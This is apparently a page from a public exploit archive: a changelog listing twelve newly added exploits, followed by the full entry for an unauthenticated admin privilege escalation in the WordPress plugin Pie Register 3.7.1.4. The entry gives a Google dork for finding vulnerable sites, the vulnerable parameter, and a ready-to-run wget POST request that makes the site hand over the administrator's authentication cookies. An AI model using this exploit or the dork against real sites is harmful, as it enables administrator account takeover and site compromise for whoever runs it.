
12 changes to exploits/shellcodes Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC) IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated) Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS) Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated) Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation Simple Online College Entrance Exam System 1.0 - Account Takeover Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection Online Enrollment Management System 1.0 - Authentication Bypass Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass Loan Management System 1.0 - SQLi Authentication Bypass
12 lines
No EOL
673 B
Text
12 lines
No EOL
673 B
Text
# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
|
|
# Google Dork: inurl:/plugins/pie-register/
|
|
# Date: 08.10.2021
|
|
# Exploit Author: Lotfi13-DZ
|
|
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
|
|
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
|
|
# Version: <= 3.7.1.4
|
|
# Tested on: ubuntu
|
|
|
|
Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin).
|
|
|
|
Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null |